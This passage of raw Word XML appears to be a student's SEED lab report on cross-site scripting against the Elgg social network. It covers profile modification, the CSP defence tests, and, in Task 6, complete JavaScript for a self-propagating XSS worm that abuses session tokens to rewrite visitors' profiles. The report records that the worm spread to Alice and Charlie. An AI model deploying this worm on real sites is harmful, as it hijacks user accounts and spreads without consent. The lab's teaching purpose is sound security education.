        <w:t>的值，用于服务器验证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A156834" w14:textId="77777777" w:rsidR="00C50EE2" w:rsidRPr="00C50EE2" w:rsidRDefault="00C50EE2" w:rsidP="00C50EE2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uestion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C50EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>If the Elgg application only provide the Editor mode for the "About Me" field, i.e.,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1747D2" w14:textId="77777777" w:rsidR="00C50EE2" w:rsidRDefault="00C50EE2" w:rsidP="00C50EE2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C50EE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>you cannot switch to the Text mode, can you still launch a successful attack?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8EEB08" w14:textId="1581B54F" w:rsidR="00C50EE2" w:rsidRDefault="00C50EE2" w:rsidP="00C50EE2">
      <w:pPr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答：可以通过页面源码对攻击代码进行调整。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596718DA" w14:textId="77777777" w:rsidR="00FB2F8C" w:rsidRDefault="00FB2F8C" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CD51F89" w14:textId="77777777" w:rsidR="00ED0C77" w:rsidRDefault="00ED0C77" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0C77">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 5: Modifying the Victim’s Profile</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED0C77">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B504041" w14:textId="0CD71B45" w:rsidR="007F79EC" w:rsidRDefault="00503288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 w:rsidR="00922A2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>捕捉含有POST请求的H</w:t>
      </w:r>
      <w:r w:rsidR="00922A2F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TTP</w:t>
      </w:r>
      <w:r w:rsidR="00922A2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>报文，获取数据信息，可知Samy的guid为5</w:t>
      </w:r>
      <w:r w:rsidR="00922A2F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00922A2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0FEE4" w14:textId="333DD114" w:rsidR="00503288" w:rsidRDefault="00922A2F" w:rsidP="00922A2F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C3AF8CB" wp14:editId="164DDDD3">
            <wp:extent cx="5274310" cy="37839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9C8" w14:textId="720753BD" w:rsidR="00922A2F" w:rsidRPr="00922A2F" w:rsidRDefault="00922A2F" w:rsidP="00922A2F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 w:rsidRPr="00922A2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在个人主页添加如下JavaScript代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C221A7" w14:textId="43FFCAB6" w:rsidR="00922A2F" w:rsidRDefault="00FF030D" w:rsidP="00922A2F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47107ECF" wp14:editId="71751676">
            <wp:extent cx="5274310" cy="20916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D9D9" w14:textId="73F40CC6" w:rsidR="00922A2F" w:rsidRPr="00922A2F" w:rsidRDefault="00922A2F" w:rsidP="00922A2F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00922A2F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改后Samy的主页如下所示，说明代码对用户身份进行了判断：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5C0A56" w14:textId="387FE415" w:rsidR="00922A2F" w:rsidRPr="00922A2F" w:rsidRDefault="00922A2F" w:rsidP="00922A2F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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D5DDABD" wp14:editId="6602FDF2">
            <wp:extent cx="5274310" cy="2315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C15A" w14:textId="57967433" w:rsidR="007F79EC" w:rsidRDefault="00922A2F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登录Alice账户，此时个人主页仍然为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F4BBFE" w14:textId="248A88EC" w:rsidR="00FF030D" w:rsidRDefault="00FF030D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1882057F" wp14:editId="476C65CF">
            <wp:extent cx="5274310" cy="2320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8D97" w14:textId="72A41700" w:rsidR="00FF030D" w:rsidRDefault="00FF030D" w:rsidP="005C0C4E">
      <w:pPr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5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访问Samy主页，则Alice的主页发生改变：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA7950" w14:textId="19ABF53A" w:rsidR="007F79EC" w:rsidRDefault="00FF030D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34CD6DC4" wp14:editId="316FCBB9">
            <wp:extent cx="5274310" cy="23088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6BC3" w14:textId="0C84BB06" w:rsidR="00993F7F" w:rsidRDefault="00993F7F" w:rsidP="005C0C4E">
      <w:pPr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6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查看资料页面，发现about</w:t>
      </w:r>
      <w:r>
        <w:rPr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me部分已经自动复制了Samy主页的内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0296486E" w14:textId="5ED70B35" w:rsidR="001A5ED3" w:rsidRPr="001A5ED3" w:rsidRDefault="00275728" w:rsidP="005C0C4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问题</w:t>
      </w:r>
      <w:r w:rsidR="001A5ED3" w:rsidRPr="001A5ED3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F122538" w14:textId="79E2FBEC" w:rsidR="00993F7F" w:rsidRPr="00993F7F" w:rsidRDefault="00993F7F" w:rsidP="00993F7F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00993F7F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">uestion 3: Why do we need Line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidRPr="00993F7F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>? Remove this line, and repeat your attack. Report and explain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908361E" w14:textId="5DE76510" w:rsidR="00275728" w:rsidRDefault="00993F7F" w:rsidP="00993F7F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00993F7F">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>your observation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF3FFD" w14:textId="2CC68129" w:rsidR="00993F7F" w:rsidRDefault="00993F7F" w:rsidP="00993F7F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答：代码①是用于做判断，当目标用户是Samy时则不进行攻击，避免Samy的个人主页立刻显示攻击内容，使得原来的攻击代码被覆盖掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5655D8F6" w14:textId="367131C1" w:rsidR="007F06C2" w:rsidRDefault="007F06C2" w:rsidP="00993F7F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F8E9188" w14:textId="77777777" w:rsidR="007F06C2" w:rsidRDefault="007F06C2" w:rsidP="00993F7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637F3C40" w14:textId="0B71CEC6" w:rsidR="005668ED" w:rsidRPr="007F06C2" w:rsidRDefault="00231E86" w:rsidP="00231E86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00231E86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 6: Writing a Self-Propagating XSS Worm</w:t>
      </w:r>
      <w:r w:rsidRPr="00231E86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000D60A8" w14:textId="72BF82DC" w:rsidR="00231E86" w:rsidRPr="00231E86" w:rsidRDefault="007F06C2" w:rsidP="00231E86">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00231E86" w:rsidRPr="00231E86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采用</w:t>
      </w:r>
      <w:r w:rsidR="00231E86" w:rsidRPr="00231E86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DOM方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="0085771D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>蠕虫</w:t>
      </w:r>
      <w:r w:rsidR="00231E86" w:rsidRPr="00231E86">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BBEE6E" w14:textId="080F0436" w:rsidR="00231E86" w:rsidRPr="00231E86" w:rsidRDefault="00231E86" w:rsidP="00231E86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>①在Samy主页再添加如下JavaScript代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313850A5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&lt;script type="text/javascript" id="worm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587AA4C1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window.onload = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740F5FA5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headerTag = "&lt;script id=\"worm\" type=\"text/javascript\"&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD52D7D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jsCode = document.getElementById("worm").innerHTML;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693EC14A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 xml:space="preserve">var tailTag = "&lt;/" + "script&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADAAEB9" w14:textId="7B503E6E" w:rsid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 xml:space="preserve">var wormCode = encodeURIComponent(headerTag + jsCode + tailTag); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281DF71E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desc = "&amp;description=Samy is my hero" + wormCode;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078072F" w14:textId="209DFF5C" w:rsidR="00961442" w:rsidRPr="00961442" w:rsidRDefault="00961442" w:rsidP="00961442">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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desc += "&amp;accesslevel[description]=2";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326DE931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userName="&amp;name="+elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D97CB8D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guid="&amp;guid="+elgg.session.user.guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0368B665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ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE22ECB" w14:textId="73A1BD47" w:rsidR="00961442" w:rsidRPr="00961442" w:rsidRDefault="00961442" w:rsidP="00961442">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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token="&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E76CAF" w14:textId="3D4DFAF7" w:rsidR="00961442" w:rsidRPr="00961442" w:rsidRDefault="00961442" w:rsidP="00961442">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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content=token+ts+name+desc+guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73916C3D" w14:textId="1AE42436" w:rsidR="00961442" w:rsidRPr="00961442" w:rsidRDefault="00961442" w:rsidP="00961442">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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 xml:space="preserve">var samyGuid=59; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD4C77" w14:textId="797F120B" w:rsidR="00961442" w:rsidRPr="00961442" w:rsidRDefault="00961442" w:rsidP="00961442">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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sendurl="http://www.seed-server.com/action/profile/edit";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445B6B10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if(elgg.session.user.guid!=samyGuid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02272BFE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF6752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//Create and send Ajax request to modify profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB8989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var Ajax=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539827F5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Ajax=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F41BE05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Ajax.open("POST", sendurl, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68237B63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Ajax.setRequestHeader("Content-Type",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3441804C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"application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3BCB3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Ajax.send(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECAF7BD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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F1042" w14:textId="77777777" w:rsidR="00961442" w:rsidRPr="00961442" w:rsidRDefault="00961442" w:rsidP="00961442">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00961442">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2399B4D9" w14:textId="3A6FA4E5" w:rsidR="00231E86" w:rsidRDefault="00961442" w:rsidP="00961442">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00961442">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA0CBD6" w14:textId="2CC52CC3" w:rsidR="00231E86" w:rsidRDefault="00231E86" w:rsidP="00275728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②</w:t>
      </w:r>
      <w:r w:rsidR="00961442">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Alice再次访问Samy主页，被动接受蠕虫病毒感染</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2352F235" w14:textId="143555D3" w:rsidR="00961442" w:rsidRDefault="00961442" w:rsidP="00275728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③登录Charlie账户，被感染前的主页如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2A2903" w14:textId="3282BFCF" w:rsidR="00961442" w:rsidRDefault="00961442" w:rsidP="00275728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B711ED6" wp14:editId="0890B52A">
            <wp:extent cx="5274310" cy="24714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40D7" w14:textId="3955A21D" w:rsidR="00961442" w:rsidRDefault="00961442" w:rsidP="00275728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④Charlie访问Alice后，主页发生改变：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2539093B" w14:textId="38B6B043" w:rsidR="00961442" w:rsidRDefault="00961442" w:rsidP="00275728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525BE3F4" wp14:editId="40E5533A">
            <wp:extent cx="5274310" cy="2588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CC29" w14:textId="06B4DE46" w:rsidR="00961442" w:rsidRPr="00231E86" w:rsidRDefault="00961442" w:rsidP="00275728">
      <w:pPr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说明蠕虫病毒攻击成功！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EFC50" w14:textId="77777777" w:rsidR="00231E86" w:rsidRDefault="00231E86" w:rsidP="00275728">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F1B3E7C" w14:textId="64063859" w:rsidR="00EA739A" w:rsidRDefault="00EA739A" w:rsidP="00275728">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA739A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Task 7: Defeating XSS Attacks Using CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DACA64A" w14:textId="1ABF14FD" w:rsidR="00720437" w:rsidRPr="00106EEA" w:rsidRDefault="00106EEA" w:rsidP="00106EE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 w:rsidRPr="00106EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459AAC99" w14:textId="2F95007C" w:rsidR="00106EEA" w:rsidRDefault="00106EEA" w:rsidP="00106EEA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114300" distR="114300" wp14:anchorId="4E84D7A5" wp14:editId="5951B05A">
            <wp:extent cx="4451350" cy="2584450"/>
            <wp:effectExtent l="0" t="0" r="1397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rcRect l="3557" t="5891" r="17157" b="116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4EF8" w14:textId="4D12FFBC" w:rsidR="00106EEA" w:rsidRPr="00106EEA" w:rsidRDefault="00106EEA" w:rsidP="00106EEA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.打开</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00106EEA">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>www.example32a.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00106EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>网页进行测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A3B77" w14:textId="177DDB92" w:rsidR="00720437" w:rsidRDefault="00106EEA" w:rsidP="00275728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①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">分别访问 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2b.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>32c.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，对比差异</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290B60F5" w14:textId="525D2CEB" w:rsidR="00720437" w:rsidRDefault="00106EEA" w:rsidP="00275728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021E20A7" wp14:editId="58D765C2">
            <wp:extent cx="3657788" cy="2375022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1065" w14:textId="672ECCC1" w:rsidR="00106EEA" w:rsidRDefault="00106EEA" w:rsidP="00275728">
      <w:pPr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0971EEB2" wp14:editId="72DEC953">
            <wp:extent cx="4292821" cy="28195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C64" w14:textId="5478FF12" w:rsidR="00106EEA" w:rsidRDefault="00106EEA" w:rsidP="00275728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0568ED6" wp14:editId="73B2A3F8">
            <wp:extent cx="4483330" cy="283859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2F4E" w14:textId="25C854B6" w:rsidR="00106EEA" w:rsidRPr="00720437" w:rsidRDefault="00106EEA" w:rsidP="00275728">
      <w:pPr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11667F8B" wp14:editId="2C4BEACA">
            <wp:extent cx="3746500" cy="25960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23" cy="26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31A3" w14:textId="4DE9C2EB" w:rsidR="00275728" w:rsidRDefault="00106EEA" w:rsidP="005C0C4E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>结论分析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE7A074" w14:textId="11BFC35F" w:rsidR="00106EEA" w:rsidRDefault="00106EEA" w:rsidP="00106EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.example32a.com </w:t>
      </w:r>
      <w:r w:rsidR="008926E8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所有的JavaScript都能执行成功，说明是设置csp防御；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B6DA19" w14:textId="1C7DEACB" w:rsidR="008926E8" w:rsidRDefault="008926E8" w:rsidP="00106EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId32" w:history="1">
        <w:r w:rsidRPr="006A7580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>www</w:t>
        </w:r>
        <w:r w:rsidRPr="006A7580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>.example32</w:t>
        </w:r>
        <w:r w:rsidRPr="006A7580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>b</w:t>
        </w:r>
        <w:r w:rsidRPr="006A7580">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr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只有4和6是成功，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、2、3、5都失败了，说明是通过Apache方式设置CSP防御；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F134CF" w14:textId="0BCF20B3" w:rsidR="00DB09D0" w:rsidRDefault="008926E8" w:rsidP="00106EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="21"/>
        </w:rPr>
